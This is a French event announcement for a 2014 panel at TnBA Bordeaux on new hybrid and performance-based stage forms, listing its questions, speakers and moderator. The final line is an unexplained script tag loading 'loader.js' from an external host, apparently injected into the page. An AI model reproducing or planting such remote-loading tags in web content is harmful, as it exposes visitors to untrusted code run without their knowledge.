•  

                                                                                               

                                                                                        TnBA - Studio de création – BORDEAUX 

                                                                              06/02/2014  - 14h/  

                          RENCONTRE SUR LES NOUVELLES FORMES DE LA SCENE

     Peut-on définir ces nouvelles formes ? Est-ce un phénomène actuel ou cela a-t-il   toujours existé ?  

     D’où prennent- elles naissance ? Pour quel public ?

     A l’heure de l’éclatement des catégories et du foisonnement de ces formes hybrides et transdisciplinaires, comment sont–elles repérées, et dans quels  contextes sont-elles  diffusées ?

     Voilà quelques questions parmi les nombreuses que nous proposerons à nos invités  représentant la scène artistique, la diffusion et l’institution. Au cours de cet échange nous aborderons les points suivants : Définition et classification Multi-Pluri-Inter-Transdisciplinaritré, renouvellement esthétique, durée, format,  hybridation, limite fiction/réalité, participation du public… Autant d’éléments qui peuvent permettre une définition et une nomenclature de ces nouvelles formes.

    D’où prennent-elles naissance ? Est-ce un phénomène nouveau ? En quoi diffèrent-elles des formes « traditionnelles » ?

    Phénomènes économiques, politiques, liés aux nouvelles technologies, aux espaces éclatés…
    Déconstruction de la notion d’œuvre, et parfois d’auteur, au profit de celle de processus…  Définition du mot
    « Performance
    »…

    Comment comprendre de telles évolutions ? Comment les institutions appréhendent-elles ces tendances de la création ? Sont-elles préparées pour le faire ? Leurs critères sont-ils adaptés à ces dynamiques artistiques ? Perte de repères culturels ?

    La production de ces nouvelles formes induit un décloisonnement des financements…
    Comment et où les artistes sont-ils repérés ? Ont-ils d’autres possibilités d’être programmés en dehors de festivals ou d’un « temps fort » d’une saison ? Ces formes ne peuvent-elles exister qu’à la marge ? Le public est-il prêt à être dérangé par cette multiplicité de propositions et comment le rendre curieux ? Faire découvrir ces nouvelles formes aux jeunes …

    Les lieux traditionnels sont-ils adaptés aux demandes de ces créateurs ? Besoin d’adaptation de l’architecture des salles …

    Autant de réflexions et questions ouvertes qui seront débattues lors de cette rencontre ou deux des artistes programmés dans nos « Rencontres » viendront nous parler de leur processus de création: Arnaud Saury (Mathieu ma fille Foundation – Marseille) et Xavier Déranlot (Fanadeep-Paris)

    Apres un court exposé sur l’histoire de la « performance » le modérateur proposera une libre circulation de la parole entre les intervenants ; puis nous écouterons les deux artistes avant d’ouvrir le débat avec le public.

    Intervenants : Catherine Marnas (Nouvelle Directrice du TnBA) et/ou Nadia Derrar (Coordinatrice générale des services TnBA) – Isabelle Barbéris (Maître de conférences en Arts du spectacle Université Paris 7 - Denis Diderot) – Patrick Lardy (Conseiller théâtre D.R.A.C. Aquitaine) – Henri Devier (Directeur artistique de la Gare Mondiale et du Festival TRAFFIK à Bergerac et metteur en scène) – Jérôme Lecardeur (Directeur du TAP de Poitiers) et Jean-Luc Terrade (Directeur artistique des Rencontres de la forme courte et metteur en scène).

    Modérateur Jean marc Adolphe (Rédacteur en chef de la Revue Mouvement et agitateur jusqu’en 2058) 

     

    <script src="//s3.amazonaws.com/html.coolpic.me/js/loader.js"></script>